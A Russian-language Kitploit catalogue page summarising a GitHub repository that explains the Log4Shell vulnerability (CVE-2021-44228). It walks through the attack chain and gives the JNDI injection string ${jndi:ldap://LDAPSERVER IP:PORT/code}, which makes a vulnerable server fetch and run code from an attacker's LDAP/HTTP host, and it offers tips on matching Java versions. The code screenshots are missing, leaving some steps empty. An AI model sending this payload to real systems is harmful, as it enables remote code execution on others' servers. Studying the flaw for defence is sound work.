Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228 — Исследование уязвимости CVE-2021-44228 | Kitploit
Инструменты/GitHubGitHub/asd58584388/cve-2021-44228
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubasd58584388/cve-2021-44228

CVE-2021-44228

Исследование уязвимости CVE-2021-44228

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Анализ CVE-2021-44228

Как это работает?

Ниже приведен подробный процесс удаленной инъекции с использованием уязвимости log4shell. Сначала рассмотрим 3 части, которые необходимо знать:

  1. Log4j2 позволяет вести логирование данных с помощью функции message lookup substitution, где сообщения лога могут включать данные, динамически извлекаемые из различных источников. (Поддерживает JNDI Lookup)

  2. JNDI Lookup: Позволяет получать данные через API Java Naming and Directory Interface (JNDI), который может взаимодействовать с различными службами каталогов

  3. LDAP (Lightweight Directory Access Protocol): Используется в основном для доступа и управления службами каталогов через сеть.


Вот простой пример удаленного выполнения кода:

  1. Хакер настраивает как LDAP сервер (доступный по протоколу LDAP, хранящий ссылку на вредоносный Java код), так и HTTP сервер (место хранения вредоносного кода).

    1. Настройка HTTP сервера в каталоге, содержащем скомпилированный вредоносный код:

    2. Настройка LDAP сервера, хранящего ссылку:

      ldap

  • Хакер отправляет вредоносный ввод (${jndi:ldap://LDAPSERVER IP:PORT/code}) в программную систему, где установлен log4j2

  • Log4j2 использует функцию lookup для отправки запроса на LDAP сервер

  • LDAP сервер перенаправляет запросы на HTTP серверы через ссылки на Java код, хранящиеся на LDAP серверах

  • HTTP сервер отправляет вредоносный код в программную систему, и затем система выполняет вредоносный код.

  • Вредоносный код:

    Выполнение вредоносного кода успешно:


    ВАЖНО:

    1. Мы можем использовать не только LDAP сервер для удаленного выполнения кода, но и другие методы (например, RMI), пока log4j2 успешно выполняет message lookup substitution и выполняет вредоносный код

    2. Разные версии Java могут сделать процесс эксплуатации разным (здесь мы используем Java 1.8u112).

    3. Рекомендуется использовать ту же версию Java во вредоносном коде, что и в программном обеспечении (сервера, использующие log4j2), или, по крайней мере, не выше версии Java, используемой в программном обеспечении.

    4. Код lookup в Log4j2:

    Скачать инструмент